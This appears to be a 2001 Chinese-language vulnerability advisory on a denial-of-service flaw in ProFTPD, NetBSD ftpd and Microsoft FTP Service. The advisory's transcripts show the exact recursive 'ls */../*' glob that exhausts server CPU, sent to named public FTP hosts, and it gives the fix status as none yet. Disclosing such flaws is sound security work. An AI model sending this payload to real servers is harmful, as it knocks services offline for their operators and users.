多个FTP守护程序存在拒绝服务攻击发布时间:2001-03-16 更新时间:2001-03-16 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Proftpd详细描述 多个FTP守护程序存在拒绝服务攻击 Proftpd的'ls'命令存在错误可以导致拒绝服务攻击: $ ftp ftp.proftpd.org .... Name (ftp.proftpd.org:j): ftp .... 230 Anonymous access granted, restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 227 Entering Passive Mode (216,10,40,219,4,111). 421 Service not available, remote server timed out. Connection closed 会导致服务器的CPU达到100%. 其他NETBSD FTP也存在此问题: ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 EPRT command successful. (long delay) 421 Service not available, remote server timed out. Connection closed Microsoft FTP服务也存在此问题,如: ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 500 'EPSV': command not understood 227 Entering Passive Mode (207,46,133,140,4,223). 200 PORT command successful. 150 Opening ASCII mode data connection for file list. (很长的一段时间等待) - Publicfile refuses the command : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 227 =131,193,178,181,97,222 550 Sorry, I can't open that file: file does not exist. 测试代码 见描述部分。 解决方案 尚无 相关信息 此信息有Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr >发布。 |
